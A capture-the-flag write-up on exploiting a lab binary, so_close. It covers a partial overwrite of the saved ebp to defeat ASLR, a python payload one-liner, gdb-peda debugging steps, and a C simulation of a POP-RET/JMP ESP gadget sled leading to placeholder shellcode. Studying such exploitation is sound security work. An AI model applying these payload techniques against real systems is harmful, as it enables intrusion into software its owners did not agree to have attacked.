Yes, it reads up to 272 bytes from our input (nbytes = a1 - buf - 4 = (ebp+0x8) - (ebp-0x10C) - 4 = 0x110 = 272; you could also figure it out by fuzzing), so we can perform a buffer overflow attack.

Let's check something:

ASLR is on! Since the stack address is random, we have to find a cleverer way to solve this challenge than overwriting eip with the address of our shellcode.

I decided to overwrite only the last byte of the saved ebp. The saved ebp is a stack address very close to our buffer, so replacing its low byte with \x0a (any other small value also works) moves it back near the start of the stack region our input occupies. The leave instruction does mov esp, ebp and then pop ebp, so once the corrupted value has been loaded into ebp we control esp, and through esp we control what ret pops.

Let's debug to see whether it has the effect we want:

Choose the payload:

python -c "print 'A'*268+'\x0a'" > /tmp/tsu

Debug so_close with gdb-peda:

gdb so_close

Set a breakpoint at the call to read:

gdb-peda$ br *0x8048467

Feed the payload to it:

gdb-peda$ r < /tmp/tsu

So totally_secure's leave pops the corrupted value into ebp, the caller's leave then moves it into esp, and when the ret that follows executes, the program jumps to somewhere near the start of the stack.

Step 2: Building the payload with ROP and shellcode to increase the success probability

In the step above we saw that overwriting the last byte of the saved ebp with a small value makes the program jump to somewhere near the start of the stack. We want that jump to land inside a long run of POP-RET gadget addresses that ends with the address of a JMP ESP gadget, followed by \x90 padding (a NOP sled) and the shellcode: the idea is that wherever the ret lands within that run, execution rides along the gadgets to JMP ESP and from there into the shellcode. Look at this picture and you will see why:
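The two steps above, as an added model written for this page (it is not code from the original writeup and it does not touch the so_close binary): it computes where the caller's ret will read after the low byte of the saved ebp is replaced, builds the stage-2 layout (gadget sled, JMP ESP, NOP padding, shellcode) as bytes, and then walks that layout from every slot the ret could land on to see which landings actually reach the shellcode. The gadget addresses G_POP_RET, G_RET and G_JMP_ESP, the saved ebp value, the stack base and the three-byte shellcode placeholder are all made-up constants.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical gadget addresses for this model only; not from so_close. */
#define G_POP_RET 0x08048f00u   /* pop ebx ; ret */
#define G_RET     0x08048f01u   /* ret           */
#define G_JMP_ESP 0x08048f10u   /* jmp esp       */

struct payload {
    uint8_t buf[512];
    size_t  len;      /* bytes used */
    size_t  sc_off;   /* offset of the (placeholder) shellcode */
};

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Step 1: only the low byte of the saved ebp is replaced by `low`. The caller's
 * leave does mov esp, ebp ; pop ebp, so its ret reads its target at new_ebp + 4. */
static uint32_t ret_slot_after_partial_overwrite(uint32_t saved_ebp, uint8_t low)
{
    uint32_t new_ebp = (saved_ebp & 0xffffff00u) | low;
    return new_ebp + 4;
}

/* Step 2 layout: n_sled copies of `sled_gadget`, the JMP ESP address, n_nop
 * NOPs, then a constructed 3-byte placeholder standing in for real shellcode. */
static void build_stage2(struct payload *p, uint32_t sled_gadget, int n_sled, int n_nop)
{
    static const uint8_t sc_placeholder[] = { 0x31, 0xc0, 0x50 };
    size_t off = 0;
    p->len = 0;
    if (n_sled < 0 || n_nop < 0 ||
        (size_t)n_sled * 4 + 4 + (size_t)n_nop + sizeof sc_placeholder > sizeof p->buf)
        return;                                   /* does not fit: leave len == 0 */
    for (int i = 0; i < n_sled; i++, off += 4) wr32(p->buf + off, sled_gadget);
    wr32(p->buf + off, G_JMP_ESP); off += 4;
    memset(p->buf + off, 0x90, (size_t)n_nop); off += (size_t)n_nop;
    p->sc_off = off;
    memcpy(p->buf + off, sc_placeholder, sizeof sc_placeholder); off += sizeof sc_placeholder;
    p->len = off;
}

/* Run the chain starting from a ret that reads at `esp`, with the payload
 * occupying [base, base + len). Returns 1 if control reaches the shellcode. */
static int reaches_shellcode(const struct payload *p, uint32_t base, uint32_t esp)
{
    for (int step = 0; step < 256; step++) {
        if (esp < base || esp - base + 4 > p->len) return 0;  /* ret reads outside payload */
        uint32_t target = rd32(p->buf + (esp - base));
        esp += 4;                                              /* ret popped this slot */
        if (target == G_RET) continue;
        if (target == G_POP_RET) { esp += 4; continue; }       /* pop eats one dword, then ret */
        if (target == G_JMP_ESP) {
            size_t off = esp - base;                           /* eip = esp: slide over NOPs */
            while (off < p->len && p->buf[off] == 0x90) off++;
            return off == p->sc_off;
        }
        return 0;   /* 0x90909090, a misaligned read, shellcode bytes: not a gadget, crash */
    }
    return 0;
}

/* Fraction of dword-aligned landing slots inside the sled (0 .. n_sled-1)
 * from which the chain reaches the shellcode. */
static double sled_success_rate(const struct payload *p, uint32_t base, int n_sled)
{
    int ok = 0;
    for (int i = 0; i < n_sled; i++)
        ok += reaches_shellcode(p, base, base + 4u * (uint32_t)i);
    return n_sled > 0 ? (double)ok / n_sled : 0.0;
}

int main(void)
{
    /* Constructed values, not measured from the target. */
    uint32_t saved_ebp = 0xffffd4c8u, base = 0xffffd300u;
    printf("caller's ret reads from 0x%08x\n", (unsigned)ret_slot_after_partial_overwrite(saved_ebp, 0x0a));

    struct payload ret_sled, pop_sled;
    build_stage2(&ret_sled, G_RET, 8, 16);
    build_stage2(&pop_sled, G_POP_RET, 8, 16);
    printf("ret sled:     %.0f%% of aligned landings reach shellcode\n", 100 * sled_success_rate(&ret_sled, base, 8));
    printf("pop;ret sled: %.0f%% of aligned landings reach shellcode\n", 100 * sled_success_rate(&pop_sled, base, 8));
    printf("misaligned landing (base+2) on ret sled reaches shellcode: %d\n", reaches_shellcode(&ret_sled, base, base + 2));
    return 0;
}
```

Two things the model makes visible that are worth checking against your own layout before spraying it: a POP-RET gadget consumes two dwords per iteration, so from a run of identical POP-RET addresses only every other landing slot reaches the JMP ESP address (the other half pops it and then rets into the 0x90 bytes), whereas a plain RET gadget consumes one dword and succeeds from every aligned slot; and a landing that is not dword-aligned reads half of one address and half of the next, which is not a gadget at all, so the low byte chosen for the saved ebp has to put esp on a 4-byte boundary of the sled.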